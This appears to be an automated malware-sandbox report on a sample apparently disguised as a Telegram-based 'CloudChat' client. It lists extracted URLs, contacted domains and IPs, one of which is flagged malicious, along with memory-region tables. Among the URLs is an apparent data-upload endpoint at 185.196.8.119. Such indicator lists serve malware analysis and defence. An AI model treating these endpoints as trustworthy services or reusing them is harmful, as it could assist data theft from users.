https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
unknown
https://www.cloudchat.com/Ah
unknown
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
unknown
http://httpbin.org/get
23.21.73.249
http://www.phreedom.org/md5)08:27
unknown
https://telesco.pe/
unknown
http://tools.ietf.org/html/rfc5869
unknown
https://core.CloudChat.org/api
unknown
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
unknown
https://github.com/mhammond/pywin32
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
unknown
https://www.cloudchat.com
unknown
http://www.lysator.liu.se/~alla/dia/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
unknown
https://cc.mom/
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
http://crl3.digi
unknown
http://www.python.org/download/releases/2.3/mro/.
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
unknown
http://bugreports.qt.io/
unknown
http://www.cc.mom/cloudchat.dog/addstickers/invalid
unknown
http://www.gribuser.ru/xml/fictionbook/2.0
unknown
https://cloudchat.comUpdate
unknown
https://twitter.com/hashtag/
unknown
https://github.com/telegramdesktop/tdesktop/blob/master/LICENSE
unknown
http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
unknown
https://telegram.org/
unknown
http://185.196.8.119:50000/upload
185.196.8.119
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
http://www.abisource.com/awml.dtd
unknown
https://www.remobjects.com/ps
unknown
http://www.freedesktop.org/standards/shared-mime-info
unknown
http://www.opengis.net/gml/3.2
unknown
https://www.innosetup.com/
unknown
http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
unknown
https://maps.google.com/maps?q=
unknown
http://tools.ietf.org/html/rfc5297
unknown
http://tools.ietf.org/html/rfc4880
unknown
https://tools.ietf.org/html/rfc3610
unknown
http://crl4.digice
unknown
http://www.python.org/dev/peps/pep-0205/
unknown
https://github.com/telegramdesktop/tdesktop/blob/master/LEGAL
unknown
https://www.cloudchat.com/
unknown
http://192.168.31.183:7890/crash.php/t?act=report
unknown
https://cloudchat.com
unknown
http://json.org
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
unknown
http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
unknown
http://xspf.org/ns/0/
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
https://github.com/telegramdesktop/tdesktop
unknown
http://python.org/dev/peps/pep-0263/
unknown
http://www.phreedom.org/md5)
unknown
https://github.com/CloudChatdesktop/tdesktop/blob/master/LEGAL
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://core.telegram.org/api
unknown
http://schema.omg.org/spec/XMI/2.1
unknown
http://schema.omg.org/spec/XMI/2.0
unknown
http://www.tarsnap.com/scrypt/scrypt-slides.pdf
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
unknown
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
unknown

Domains

Name
IP
Malicious
www.cloudchat.com
188.114.97.3
gitlab.com
172.65.251.78
httpbin.org
23.21.73.249

IPs

IP
Domain
Country
Malicious
185.196.10.235
unknown
Switzerland
malicious
185.196.8.119
unknown
Switzerland
172.65.251.78
gitlab.com
United States
66.228.63.21
unknown
United States
188.114.97.3
www.cloudchat.com
European Union
45.79.244.41
unknown
United States
103.78.229.139
unknown
China
66.228.63.175
unknown
United States
139.144.164.192
unknown
United States
139.144.164.103
unknown
United States
23.21.73.249
httpbin.org
United States

Registry

Path
Value
Malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
7624000
trusted library allocation
page read and write
2BEAFA00000
direct allocation
page read and write
C722000
heap
page read and write
2BEAFEE4000
heap
page read and write
7FF8B8835000
unkown
page readonly
7FF692A0D000
unkown
page readonly
7FF8492A0000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
266D2F7F000
heap
page read and write
C860000
trusted library allocation
page read and write
218FABA0000
heap
page execute and read and write
7FF692A26000
unkown
page readonly
7FF8B7E05000
unkown
page readonly
8E8000
heap
page read and write
2BEAFAED000
heap
page read and write
24E56FF0000
heap
page read and write
10708000
heap
page read and write
30D9000
direct allocation
page read and write
266D2F70000
heap
page read and write
31B2000
direct allocation
page read and write
2BEAD9F2000
heap
page read and write
2BEAFB2D000
heap
page read and write
7442000
trusted library allocation
page read and write
3194000
direct allocation
page read and write
2BEAFB2C000
heap
page read and write
35C0000
direct allocation
page read and write
F21C000
heap
page read and write
2BEADA09000
heap
page read and write
7FF8BA251000
unkown
page readonly
2BEAFE60000
direct allocation
page read and write
7FF8B8CB3000
unkown
page readonly
F740000
trusted library allocation
page read and write
F7F0000
trusted library allocation
page read and write
3176000
direct allocation
page read and write
15C1000
heap
page read and write
1064E000
heap
page read and write
C7C6000
heap
page read and write
7FF84924B000
trusted library allocation
page read and write
EE11000
heap
page read and write
2BEAD9AC000
heap
page read and write
7FF8B8833000
unkown
page readonly
2BEAD970000
heap
page read and write
C860000
trusted library allocation
page read and write
220FCAA8000
heap
page read and write
15E1000
heap
page read and write
15C5000
heap
page read and write
2BEAFEF1000
heap
page read and write
F61C000
heap
page read and write
2BEAD9C4000
heap
page read and write
2BEAFB2D000
heap
page read and write
2BEAFCA0000
direct allocation
page read and write
2BEAFEF4000
heap
page read and write
8E4000
heap
page read and write
2BEAF2C0000
heap
page read and write
8E3000
heap
page read and write
10728000
heap
page read and write
43E1000
heap
page read and write
2BEAFB1D000
heap
page read and write
9CFA000
heap
page read and write
2BEAFA4D000
heap
page read and write
10751000
heap
page read and write
266D2F79000
heap
page read and write
2BEAD9EA000
heap
page read and write
186E000
stack
page read and write
106E8000
heap
page read and write
8E3000
heap
page read and write
9DB3000
heap
page read and write
BD957CF000
stack
page read and write
266D2F7F000
heap
page read and write
6C70000
trusted library allocation
page read and write
1079E000
heap
page read and write
7FF8BA4F8000
unkown
page read and write
7F80B000
direct allocation
page read and write
2BEAD9B1000
heap
page read and write
2BEAD9EA000
heap
page read and write
2BEAD900000
heap
page read and write
2BEAFB2C000
heap
page read and write
7FF849174000
trusted library allocation
page read and write
218FB47A000
heap
page read and write
2BEAD9EF000
heap
page read and write
9B4E000
heap
page read and write
266D2F79000
heap
page read and write
2BEAFC60000
direct allocation
page read and write
2BEAD988000
heap
page read and write
2BEAFEF8000
heap
page read and write
7FF000
stack
page read and write
2BEAFF18000
heap
page read and write
6C76000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
2BEADA00000
heap
page read and write
1071F000
heap
page read and write
266D2F72000
heap
page read and write
3036000
direct allocation
page read and write
7FF692A26000
unkown
page readonly
8E4000
heap
page read and write
86B2000
heap
page read and write
B22000
heap
page read and write
30F6000
direct allocation
page read and write
266D2F7B000
heap
page read and write
7585000
trusted library allocation
page read and write
8E4000
heap
page read and write
317D000
direct allocation
page read and write
7FF8B8C11000
unkown
page execute read
266D2EC0000
heap
page read and write
F263000
heap
page read and write
266D2F80000
heap
page read and write
2BEAD970000
heap
page read and write
8D0000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
8E3000
heap
page read and write
3158000
direct allocation
page read and write
7FF8B7E25000
unkown
page readonly
2BEAFAFD000
heap
page read and write
8E3000
heap
page read and write
6D60000
trusted library allocation
page read and write
BD94ABE000
stack
page read and write
8E3000
heap
page read and write
2BEAFB2D000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFEE6000
heap
page read and write
218FB52B000
heap
page read and write
6C7A000
heap
page read and write
10652000
heap
page read and write
1380000
heap
page read and write
6C70000
trusted library allocation
page read and write
1059A000
heap
page read and write
2BEAFF01000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
10613000
heap
page read and write
30F0000
direct allocation
page read and write
8E3000
heap
page read and write
BD94937000
stack
page read and write
2BEAD998000
heap
page read and write
2BEAFB2D000
heap
page read and write
6F0000
heap
page read and write
1069C000
heap
page read and write
3106000
direct allocation
page read and write
2BEAFAFE000
heap
page read and write
24E57010000
heap
page read and write
2BEAD983000
heap
page read and write
8E3000
heap
page read and write
F750000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
2BEAFAFE000
heap
page read and write
9D7000
unkown
page readonly
C860000
trusted library allocation
page read and write
218FB4E2000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
218FB2E9000
heap
page read and write
3653000
heap
page read and write
8E3000
heap
page read and write
6D60000
trusted library allocation
page read and write
442000
unkown
page read and write
2BEAD9EB000
heap
page read and write
73E000
stack
page read and write
105E2000
heap
page read and write
266D2F79000
heap
page read and write
10763000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
6652000
direct allocation
page read and write
2BEAFF01000
heap
page read and write
BD9568E000
stack
page read and write
266D49B0000
heap
page read and write
15DC000
heap
page read and write
10622000
heap
page read and write
C860000
trusted library allocation
page read and write
2BEB00DA000
heap
page read and write
710000
unkown
page readonly
F740000
trusted library allocation
page read and write
AAE000
heap
page read and write
7FF8B7DE0000
unkown
page readonly
1074E000
heap
page read and write
266D2F7C000
heap
page read and write
C860000
trusted library allocation
page read and write
3131000
direct allocation
page read and write
2BEAFB2D000
heap
page read and write
7FF8B7DF1000
unkown
page execute read
266D2F72000
heap
page read and write
1060A000
heap
page read and write
4020000
direct allocation
page read and write
FA549FF000
stack
page read and write
6E51000
heap
page read and write
319B000
direct allocation
page read and write
7FF8B8830000
unkown
page readonly
2BEAFEF1000
heap
page read and write
2BEAFB2C000
heap
page read and write
10705000
heap
page read and write
1061E000
heap
page read and write
9B10000
trusted library allocation
page read and write
B26000
heap
page read and write
7FF8A8DE0000
unkown
page readonly
7FF8BFAB9000
unkown
page readonly
7FF8B78B0000
unkown
page readonly
2BEAFEE1000
heap
page read and write
F616000
heap
page read and write
8E3000
heap
page read and write
DA1000
unkown
page execute read
8E3000
heap
page read and write
266D2F80000
heap
page read and write
2BEAFEE0000
heap
page read and write
BD9570D000
stack
page read and write
3650000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAFEF4000
heap
page read and write
106A3000
heap
page read and write
7FF8B7E41000
unkown
page execute read
8E3000
heap
page read and write
9D4B000
heap
page read and write
2BEAD9EF000
heap
page read and write
4150000
direct allocation
page read and write
8E3000
heap
page read and write
1396000
heap
page read and write
1059D000
heap
page read and write
15F8000
heap
page read and write
2BEAD9B1000
heap
page read and write
1390000
heap
page read and write
2BEAFF18000
heap
page read and write
7FF8B7833000
unkown
page readonly
21880083000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
F740000
trusted library allocation
page read and write
266D2F7F000
heap
page read and write
2BEAFAF6000
heap
page read and write
2BEAD9D8000
heap
page read and write
7FF8B78C1000
unkown
page execute read
2BEAFAEB000
heap
page read and write
AD7000
heap
page read and write
266D2F7F000
heap
page read and write
218FB200000
heap
page read and write
218F90D0000
heap
page read and write
2BEAFA7D000
heap
page read and write
2BEAFF18000
heap
page read and write
15AE000
heap
page read and write
2BEAFB2C000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFA41000
heap
page read and write
105FE000
heap
page read and write
7FF6929E1000
unkown
page execute read
30F8000
direct allocation
page read and write
8E4000
heap
page read and write
308D000
direct allocation
page read and write
BD947FD000
stack
page read and write
218F9191000
heap
page read and write
8E3000
heap
page read and write
7FF8A8E04000
unkown
page readonly
2BEAFF18000
heap
page read and write
9DC0000
trusted library allocation
page read and write
2BEAFF01000
heap
page read and write
311C000
direct allocation
page read and write
7FF8BA240000
unkown
page readonly
6C70000
trusted library allocation
page read and write
911B000
heap
page read and write
2BEAFA41000
heap
page read and write
2BEAFA00000
direct allocation
page read and write
2BEAFED1000
heap
page read and write
8E3000
heap
page read and write
1840000
heap
page read and write
8E3000
heap
page read and write
2BEADA01000
heap
page read and write
266D2F72000
heap
page read and write
9DC4000
trusted library allocation
page read and write
2BEAFEE6000
heap
page read and write
266D2E90000
heap
page read and write
316E000
direct allocation
page read and write
430E000
direct allocation
page read and write
7FF8B7835000
unkown
page readonly
10601000
heap
page read and write
218FB57C000
heap
page read and write
2BEAD98D000
heap
page read and write
C860000
trusted library allocation
page read and write
24E57010000
heap
page read and write
36EF000
direct allocation
page read and write
2BEAD9EA000
heap
page read and write
2BEAFF01000
heap
page read and write
DE90000
trusted library allocation
page read and write
266D2F7F000
heap
page read and write
8E3000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
7FF849090000
trusted library allocation
page read and write
8E3000
heap
page read and write
17A1000
unkown
page execute read
266D2F80000
heap
page read and write
C870000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAD9C4000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
7FF8B9840000
unkown
page readonly
266D2F80000
heap
page read and write
218FB247000
heap
page execute and read and write
9D74000
heap
page read and write
7F53000
heap
page read and write
9BE000
unkown
page write copy
9DC0000
trusted library allocation
page read and write
8E3000
heap
page read and write
AD7000
heap
page read and write
439000
unkown
page write copy
7FF8490C0000
trusted library allocation
page read and write
8E3000
heap
page read and write
DE90000
trusted library allocation
page read and write
2BEAFB02000
heap
page read and write
266D2F79000
heap
page read and write
9F40000
trusted library allocation
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
BD9467D000
stack
page read and write
7FF8A8EEF000
unkown
page read and write
30FF000
direct allocation
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
266D2F80000
heap
page read and write
7FF8B78A1000
unkown
page execute read
7FF8B7E63000
unkown
page readonly
220FCA8C000
heap
page read and write
2BEAF670000
direct allocation
page read and write
7FF8B93D2000
unkown
page read and write
218901B2000
trusted library allocation
page read and write
10781000
heap
page read and write
15EA000
heap
page read and write
218F91AF000
heap
page read and write
2BEAF870000
direct allocation
page read and write
218FAC30000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAFEF1000
heap
page read and write
266D2F80000
heap
page read and write
2188191A000
trusted library allocation
page read and write
8E3000
heap
page read and write
7FF8B8B46000
unkown
page readonly
C860000
trusted library allocation
page read and write
7FF8BA4F9000
unkown
page readonly
F45C000
heap
page read and write
F770000
trusted library allocation
page read and write
2BEAFEE6000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFEE6000
heap
page read and write
158E000
stack
page read and write
739F000
trusted library allocation
page read and write
218FB4B9000
heap
page read and write
2BEAD9EB000
heap
page read and write
1072C000
heap
page read and write
9F40000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
7FF8491E4000
trusted library allocation
page read and write
266D2F79000
heap
page read and write
2BEAFEEF000
heap
page read and write
8E3000
heap
page read and write
266D2F72000
heap
page read and write
C87E000
heap
page read and write
2BEAFAF6000
heap
page read and write
7FF8B78C0000
unkown
page readonly
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFA00000
direct allocation
page read and write
2BEAFA50000
heap
page read and write
2BEAD9A4000
heap
page read and write
F760000
trusted library allocation
page read and write
F800000
trusted library allocation
page read and write
7FF849260000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
7FF8B8B02000
unkown
page readonly
DDA0000
trusted library allocation
page read and write
15D0000
heap
page read and write
10649000
heap
page read and write
158E000
heap
page read and write
AE6000
heap
page read and write
2BEAFB2C000
heap
page read and write
107BA000
heap
page read and write
7FF8B8B0E000
unkown
page read and write
739B000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
2BEAFAFD000
heap
page read and write
F740000
trusted library allocation
page read and write
2BEAFAC8000
heap
page read and write
5C00000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
2BEAFA59000
heap
page read and write
1397000
heap
page read and write
2BEAFB2C000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFEF8000
heap
page read and write
9BD1000
heap
page read and write
7FF849000000
trusted library allocation
page execute and read and write
15FA000
heap
page read and write
2BEAD981000
heap
page read and write
E8A9BBE000
stack
page read and write
8E3000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
2BEAFF01000
heap
page read and write
2BEAFAEA000
heap
page read and write
7FA4000
heap
page read and write
266D2F72000
heap
page read and write
F760000
trusted library allocation
page read and write
C74C000
heap
page read and write
7151000
heap
page read and write
6C75000
trusted library allocation
page read and write
266D2F7D000
heap
page read and write
2BEAFEF8000
heap
page read and write
7F51B000
direct allocation
page read and write
7FF8BA4F5000
unkown
page readonly
2BEAFAF6000
heap
page read and write
1850000
heap
page read and write
2BEAF6F0000
direct allocation
page read and write
8E3000
heap
page read and write
7FF8A8F0C000
unkown
page read and write
6C70000
trusted library allocation
page read and write
17A1000
unkown
page execute read
21881AC3000
trusted library allocation
page read and write
7FF692A26000
unkown
page readonly
8E3000
heap
page read and write
2BEAFAC8000
heap
page read and write
F740000
trusted library allocation
page read and write
8E3000
heap
page read and write
218F9340000
trusted library allocation
page read and write
F740000
trusted library allocation
page read and write
1062E000
heap
page read and write
8A02000
heap
page read and write
F740000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
2BEAFD80000
direct allocation
page read and write
105EB000
heap
page read and write
6806000
direct allocation
page read and write
C860000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
E8A99CE000
stack
page read and write
7FF8B7E23000
unkown
page readonly
7FF8A8F17000
unkown
page readonly
DA0000
unkown
page readonly
266D2F7F000
heap
page read and write
2BEADA06000
heap
page read and write
12FC000
stack
page read and write
7FF8B8F71000
unkown
page execute read
C868000
heap
page read and write
F770000
trusted library allocation
page read and write
7FF8B7895000
unkown
page read and write
2BEAFAF5000
heap
page read and write
E8A97DE000
stack
page read and write
1540000
heap
page read and write
266D2F7F000
heap
page read and write
2BEAFF01000
heap
page read and write
266D2F80000
heap
page read and write
2BEAFB24000
heap
page read and write
BD94CBB000
stack
page read and write
7FF8B7E10000
unkown
page readonly
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
300B000
direct allocation
page read and write
90E2000
heap
page read and write
2BEADA02000
heap
page read and write
7FF8A8EEA000
unkown
page read and write
2BEAFEE6000
heap
page read and write
3019000
direct allocation
page read and write
7FF8B7DE3000
unkown
page readonly
6C70000
trusted library allocation
page read and write
2BEAFAC8000
heap
page read and write
15B6000
heap
page read and write
7FF849280000
trusted library allocation
page read and write
2BEAFA57000
heap
page read and write
441E000
heap
page read and write
43E1000
heap
page read and write
7FF8A8EAB000
unkown
page read and write
15AA000
heap
page read and write
2BEAFB2C000
heap
page read and write
10718000
heap
page read and write
31FA000
direct allocation
page read and write
21880C2C000
trusted library allocation
page read and write
F7F0000
trusted library allocation
page read and write
30DA000
direct allocation
page read and write
3123000
direct allocation
page read and write
6C70000
trusted library allocation
page read and write
BD94C3C000
stack
page read and write
2BEAFEF1000
heap
page read and write
F740000
trusted library allocation
page read and write
266D2F70000
heap
page read and write
266D2F72000
heap
page read and write
8E4000
heap
page read and write
9B10000
trusted library allocation
page read and write
2BEAFEF8000
heap
page read and write
15ED000
heap
page read and write
266D2F79000
heap
page read and write
24E57010000
heap
page read and write
304B000
direct allocation
page read and write
218FABF0000
heap
page read and write
2BEAFEE6000
heap
page read and write
1074C000
heap
page read and write
BD94BBF000
stack
page read and write
7FF8B9F6F000
unkown
page readonly
F267000
heap
page read and write
2BEAFAF6000
heap
page read and write
F61A000
heap
page read and write
6C75000
trusted library allocation
page read and write
8E3000
heap
page read and write
7FF692A20000
unkown
page write copy
8E3000
heap
page read and write
21881921000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
8E3000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
2BEAFB2C000
heap
page read and write
3201000
direct allocation
page read and write
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFAF5000
heap
page read and write
2BEAFA54000
heap
page read and write
2BEAF8B0000
direct allocation
page read and write
10638000
heap
page read and write
2BEAFF01000
heap
page read and write
21890001000
trusted library allocation
page read and write
BD948BE000
stack
page read and write
266D2F80000
heap
page read and write
2BEAFB06000
heap
page read and write
7FF8492B0000
trusted library allocation
page read and write
1064B000
heap
page read and write
218FB469000
heap
page read and write
2BEAFB2C000
heap
page read and write
218F9150000
heap
page read and write
2BEAFB05000
heap
page read and write
2BEAD970000
heap
page read and write
7FF8B9F75000
unkown
page readonly
7FF8B8B39000
unkown
page readonly
7FF8490A0000
trusted library allocation
page read and write
2BEAFB02000
heap
page read and write
10721000
heap
page read and write
2BEAFAF3000
heap
page read and write
218FAD20000
heap
page read and write
10689000
heap
page read and write
266D2F7F000
heap
page read and write
8E3000
heap
page read and write
F7F0000
trusted library allocation
page read and write
4020000
direct allocation
page read and write
30D1000
direct allocation
page read and write
F740000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
3104000
direct allocation
page read and write
4348000
direct allocation
page read and write
218FBCE0000
heap
page read and write
2BEAD9A7000
heap
page read and write
8E3000
heap
page read and write
C860000
trusted library allocation
page read and write
31D6000
direct allocation
page read and write
266D2F7F000
heap
page read and write
390000
unkown
page readonly
21881923000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
7FF8BA241000
unkown
page execute read
380F000
direct allocation
page read and write
105D1000
heap
page read and write
9C5000
unkown
page read and write
F760000
trusted library allocation
page read and write
8E3000
heap
page read and write
4422000
heap
page read and write
266D2F72000
heap
page read and write
266D2F7F000
heap
page read and write
7FF8A8D9E000
unkown
page readonly
107BD000
heap
page read and write
9B5E000
heap
page read and write
2BEAD981000
heap
page read and write
2BEAFEEF000
heap
page read and write
93BB000
heap
page read and write
30E2000
direct allocation
page read and write
6D70000
trusted library allocation
page read and write
7FF8B7890000
unkown
page readonly
C0EDBED000
stack
page read and write
2BEB017E000
heap
page read and write
7FF8B8F70000
unkown
page readonly
F269000
heap
page read and write
1079B000
heap
page read and write
2BEAFB2C000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
10608000
heap
page read and write
2BEAD9B1000
heap
page read and write
2BEAD9A2000
heap
page read and write
2BEAD998000
heap
page read and write
7FF8B7E51000
unkown
page readonly
3053000
direct allocation
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
8E3000
heap
page read and write
C860000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
7FF8B7834000
unkown
page read and write
2BEAFF01000
heap
page read and write
7FF8B7841000
unkown
page execute read
2BEAD9EA000
heap
page read and write
7FF8B7896000
unkown
page readonly
7FF8A8B11000
unkown
page execute read
2BEAFD00000
direct allocation
page read and write
2BEAFEF8000
heap
page read and write
2BEAFEE4000
heap
page read and write
2BEADA02000
heap
page read and write
449000
unkown
page readonly
15F5000
heap
page read and write
7FF8B7E07000
unkown
page readonly
BD9493E000
stack
page read and write
7FF8B7831000
unkown
page execute read
218F9130000
heap
page read and write
2BEAFB39000
heap
page read and write
218FB563000
heap
page read and write
2BEAFEF1000
heap
page read and write
6C70000
trusted library allocation
page read and write
3012000
direct allocation
page read and write
2BEAFEE6000
heap
page read and write
7BE000
stack
page read and write
218FAD25000
heap
page read and write
7FF6929E1000
unkown
page execute read
266D2F79000
heap
page read and write
7FF6929E0000
unkown
page readonly
15DD000
heap
page read and write
7FF692A0D000
unkown
page readonly
8E3000
heap
page read and write
8E4000
heap
page read and write
1071A000
heap
page read and write
2BEAFEE6000
heap
page read and write
266D2F80000
heap
page read and write
3044000
direct allocation
page read and write
8E3000
heap
page read and write
2BEAD968000
heap
page read and write
7FF8B9F60000
unkown
page readonly
7FF849150000
trusted library allocation
page read and write
2BEAD94C000
heap
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
6D70000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
43E1000
heap
page read and write
31A4000
direct allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
2BEAFB2D000
heap
page read and write
266D2F72000
heap
page read and write
9CA9000
heap
page read and write
8E3000
heap
page read and write
24E57010000
heap
page read and write
266D2F72000
heap
page read and write
3208000
direct allocation
page read and write
2BEAFEF4000
heap
page read and write
6C80000
trusted library allocation
page read and write
218F91D7000
heap
page read and write
2BEAFF03000
heap
page read and write
3D0000
heap
page read and write
2BEAFEEF000
heap
page read and write
218F9370000
heap
page readonly
7C86000
heap
page read and write
86EA000
heap
page read and write
4339000
direct allocation
page read and write
C860000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
266D4B80000
heap
page read and write
2BEAFF01000
heap
page read and write
F740000
trusted library allocation
page read and write
F740000
trusted library allocation
page read and write
BD944FE000
stack
page read and write
2BEAD981000
heap
page read and write
DD10000
trusted library allocation
page read and write
6E00000
trusted library allocation
page read and write
10657000
heap
page read and write
266D2F77000
heap
page read and write
A28000
unkown
page readonly
C817000
heap
page read and write
2BEAD9EB000
heap
page read and write
2BEAD9B3000
heap
page read and write
31E4000
direct allocation
page read and write
8E3000
heap
page read and write
266D2F72000
heap
page read and write
2BEAF2C4000
heap
page read and write
8E3000
heap
page read and write
2BEAFEF1000
heap
page read and write
15D0000
heap
page read and write
F740000
trusted library allocation
page read and write
2BEAFEF8000
heap
page read and write
266D2F72000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
10768000
heap
page read and write
6C70000
trusted library allocation
page read and write
7FF8B7E01000
unkown
page execute read
2BEAFB2D000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
2BEAFEF1000
heap
page read and write
8E3000
heap
page read and write
4460000
heap
page read and write
AB2000
heap
page read and write
7FF8B7E21000
unkown
page execute read
8E4000
heap
page read and write
9B14000
heap
page read and write
106FB000
heap
page read and write
2BEAFAFF000
heap
page read and write
7FF8B78C4000
unkown
page readonly
7FF8B8C13000
unkown
page readonly
9DC0000
trusted library allocation
page read and write
7FF849250000
trusted library allocation
page read and write
7FF8BA4F0000
unkown
page readonly
3820000
trusted library allocation
page read and write
266D2F58000
heap
page read and write
2BEAFB2C000
heap
page read and write
15C1000
heap
page read and write
30FD000
direct allocation
page read and write
9B46000
heap
page read and write
266D2F79000
heap
page read and write
2BEAFF01000
heap
page read and write
F750000
trusted library allocation
page read and write
307F000
direct allocation
There are 1622 hidden memdumps.